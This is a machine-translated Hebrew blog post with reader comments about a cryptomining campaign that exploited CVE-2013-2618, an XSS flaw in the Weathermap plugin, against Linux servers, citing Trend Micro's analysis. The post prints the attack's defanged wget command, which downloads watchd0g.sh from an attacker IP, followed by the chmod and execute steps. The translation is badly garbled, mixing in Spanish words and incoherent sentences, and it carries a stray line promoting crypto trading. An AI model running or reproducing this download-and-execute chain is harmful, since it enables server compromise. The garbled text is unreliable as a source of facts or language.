זה מ הכורה בקריפטו עם שימוש במחשבים מרוחקים ללא אישור מבעלי אלה הופך לטרנד. כבר דיברתי על זה בכמה הזדמנויות כאן בבלוג על סוג זה של סיטואציות.
וזה כי זה כבר יצא לגמרי משליטה מהרגע שמטבעות קריפטוגרפיים תפסו מקום וערך לא מבוטלים, אנשים עם מספיק ידע כדי לגשת למחשבים שמפרים את ביטחונם, הקדישו לבזבז זמן בחיפוש אחר מידע חשוב או חשבונות בנק כדי להשיג תועלת כספית.
במקום לעשות זאת הם בוחרים בדבר הפשוט ביותר להשתלט על הצוותים הללו ולאחד אותם ברשת כרייה וגם למשימות אחרות שהן בדרך כלל עושות עם botnet.
בדרך זו זה בדרך כלל יותר למספר אותך מחדש, הם מתמקדים רק בכסף המיידי שמייצר.
עם הבנה חכמה של מגמות בשוק וידע נכון על סחר בקריפטו, אפשר לקצור יתרונות גדולים.
האם לינוקס היא באמת מערכת מאובטחת?
לרבים מאיתנו יש את הרעיון שלינוס היא מערכת הפעלה מאובטחת כמעט מושלמת, המציאות היא שיש לה עדיין כמה פגמים.
ובכן ישכמה ימים טרנד מיקרו ביצעה מציאה, בו גילה חדש פגם במערכות לינוקס שהעניקו להאקרים את היתרון של כריית מטבעות קריפטוגרפיים באמצעות שרתי ומכונות לינוקס.
בהצהרה דרך הבלוג שלך הם הגיבו על הדברים הבאים:
באמצעות הניטור שלנו הקשור לתגובת אירוע, ראינו ניסיונות חדירה שאת האינדיקטורים שלהם הצלחנו לתאם עם קמפיין כריית קריפטוגרפים קודם שהשתמש בתוכנות זדוניות של ג'נקינס מינר.
ההבדל: מסע פרסום זה מכוון לשרתי לינוקס. זהו גם מקרה קלאסי של פגיעות בשימוש חוזר, מכיוון שהוא מנצל פגם אבטחה מיושן שהתיקון שלו היה זמין כמעט חמש שנים.
במהדורה זו באמצעות הניתוח שלך הצליח לזהות את האתרים המושפעים על הכישלון הזה ש זה משפיע בעיקר על יפן, טייוואן, סין, ארה"ב והודו.
ניתוח התקפה
באמצעות ניתוח על ידי רשת ההגנה החכמה של Trend Micro פרט מעט כיצד התוקפים מנצלים את הפגם הזה:
מפעילי הקמפיין הזה ניצלו את CVE-2013-2618, פגיעות מתוארכת בתוסף Camapi Network Weathermap, שמנהלי מערכות משתמשים בהם כדי לדמיין את פעילות הרשת.
באשר למה הם מנצלים פגם אבטחה ישן: לרשת Weathermap יש רק שתי נקודות תורפה שדווחו בפומבי עד כה, שתיהן מיוני 2014.
תוקפים אלה עשויים לנצל לא רק פגם אבטחה שניתן לנצל עבורו, אלא גם את עיכוב התיקון המתרחש בארגונים המשתמשים בכלי הקוד הפתוח.
בעיקרון ההתקפה היא באמצעות התקפת XSS:
החלק המטושטש הוא יעד ההתקפה, שרת אינטרנט עם יציאה.
את הקובץ / plugins/weathermap/configs/conn.php הוא הקובץ הנובע מהתקפת ה- XSS המתמשכת ב- / תוספים / מפת מזג אוויר / php .
Además דה conn.php בתחילה אנו רואים בקשת HTTP דומה המופעלת על דף בשם ' cools.php '.
תוכנית הכרייה של קריפטו מופצת באמצעות הפגיעות ממפת מזג האוויר של PHP ביעדים שהם שרתי לינוקס
בתמונה ניתן לראות כיצד נוצרת ההתקפה והיא מתוארת באופן הבא:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
מה שהיא עושה זה לשלוח את האינדיקציה להורדת קובץ עם wget, שהוא כלי שירות שכמעט כל הפצות לינוקס התקינו כברירת מחדל.
chmod 775 watchd0g.sh
הופך את הקובץ לביצוע
./watchd0g.sh
מה שהוא עושה בסופו של דבר הוא לגרום לקובץ לפעול בשרת.
למרבה המזל יש כבר תיקון ( CVE-2013-2618 ) זמין לכישלון אתה יכול להוריד אותו מן הקישור הזה.
Si אתה רוצה לדעת יותר על זה מכשל זה תוכלו לבקר בקישור זה.
מקור: כורה מטבע קריפטוגרפי המופץ באמצעות פגיעות של Weathermap ב- PHP, מכוון לשרתי לינוקס
להיות אידיוט זה לא בטוח, ולמרות זאת לינוקס מצילה אותך.
אי עדכון תיקוני האבטחה אינו באשמת לינוקס. זו האשמה שחברות מסוימות, כדי לחסוך כסף, שוכרות אידיוטים כמנהלי מערכות,
אך למרות זאת, הוא זוהה באופן מיידי ונפתר מיד, אפילו כל אירוע ביטחוני קל כזה מתפרסם.
ואיזו תקלה יש לינוקס בכך שהעדכונים שלה לא מיושמים? מפתחי GNU / Linux עושים את עבודתם על ידי פיתוח פתרונות לפגיעות מתפתחות והפיכתם לזמינים למשתמשים. אם הרופא רושם חיסון נגד שפעת ואתה לא מקבל אותו, אתה חולה ונוקשה ... האם זה באשמת הרופא?
DesdeLinux זה לא מה שהיה, שני ידיעות ברצף עם שתי שגיאות חשובות:
1.- בעורכים טובים יותר לפתח הם מכניסים תוכנה שאינה תוכנה חופשית והם שוכחים אחרים שכן (הם מצוטטים בתגובות).
2.- חדשות אדירות על וירוסים כאשר הם משפיעים רק על שרתי NON UPDATED. אבל אם לינוקס כלשהו עודכן כברירת מחדל במשך עשרות שנים. כדי לפחד כאילו אתה זקוק לאנטי-וירוס מוצץ בסגנון Windows. נראה שהם מנסים לומר כי לינוקס זהה ל- Windows ולא.
אם באג ישן וכבר תוקן, זה לא חדשות ולא כלום. אל תשחקו במיקרוסופט ובחברות אנטי-וירוס כמו Trend Micro, Norton, Panda או McAffee, ואל תקבלו תשלום.
אגב, השתמשנו ב- Trend Micro במשך כמה שנים בחברה וזה היה תפוח אדמה אמיתי, בלגן, מכיוון שהמערכת שלה אמרה שלמנהל הפעלה יש "עקבות" של וירוסים (משהו שיכול להיות וירוס, גם אם זה היה לא) ומדוע זה הסיר אותו (זה לקח אותו לספריה כדי שלא יפעל) לא מאפשר את השימוש בו, ולא היה לו שום רשימת היתרים לביטול חסימת ההתנהגות הזו עם קובץ הפעלה בטוח שעלינו להשתמש בו. לך חרא. זו הייתה הגרסה הארגונית, ולגרסה האינדיבידואלית הייתה אפשרות זו לרשימת ההיתרים. מעורר רחמים.
אל תתאר את עצמך באלגנטיות כל כך.
המאמר מדבר על חור אבטחה שמאפשר לך להיכנס לתוכנית, להפוך אותה להפעלה ולהריץ אותה, שהיא חור האבטחה שכל וירוס צריך להפיץ, כמובן כדי להיות וירוס שהוא צריך שהתוכנית שהוזנה תהיה בקוד שלה. האפשרות לסרוק מחשבים ברשת לחזור על הפעולה והעתקה עצמית. הם לא בדיוק עושים זאת מכיוון שבלינוקס חורי האבטחה שהתגלו מכוסים על ידי תיקון אבטחה, ולכך אני מתכוון בהבדל בין חלונות ללינוקס, מכיוון שאין צורך באנטי-וירוס אלא בכיסוי החור. ב- Windows זה קשה יותר מכמה סיבות: 1. - הקבצים יכולים להיות ניתנים להפעלה פשוט בגלל הסיומת שלהם, מה שמסיר צעד להכנסת המחשב המושפע. 2.- משתמשים מתקינים ללא הרף תוכניות ממוצא מפוקפק מכיוון שהן קנייניות וצריכות לקבל אותן מבלי לשלם (אני לא אומרת כלום מה יהיה עבור כלכלה ביתית לקנות MS Office, Photoshop, ... יותר מהכפלת העלות של את ציוד המחשב). 3.- במוקדם או במאוחר חלונות ישטפו, המשתמש לוקח את זה לשכן, חבר, ... שכדי לא לבזבז זמן, מעצב הכל ומתקין את Windows Ultimate עם תיקון הפעלה שאינו מעודכן או ש התיקון עצמו מציב תוכנית ריגול. יכול להיות שזה לא וזה נהדר, אבל יכול להיות שיש Windows שמרגל אחר הסיסמאות. במאמר הם מזכירים את מערכת ההקדמה בלינוקס המושפעת מהפגיעות, מה שהופך את התוכנית שסורקת אוטומטית את הרשת ומשתמשת בה כדי להעתיק את עצמה ולהריץ אותה על השרת היא החלק הקל מכולם, מסיבה זו הגיבו במאמר. הוא הצעד החשוב ביותר לכל וירוס: הכרת פגיעות המערכת לתקיפה.
מידע גרוע. זה לא באג בלינוקס, זה באג ביישום PHP, כלומר הוא מרובה צורות. זה אפילו לא בלעדי למערכות שמריצות את ליבת הלינוקס! אך גם אם היישום לא היה חוצה פלטפורמות, זה לא היה באג של לינוקס, זה היה יישום בלבד.
לגרעין לינוקס אין כל הפרעה קלה בהגנה מפני התקפות סקריפטים בין אתרים כמו זו. לפחות תחקור חמש דקות לפני שתפרסם כי האמת שלכל מי שיודע קצת על משהו, אתה ייראה רע.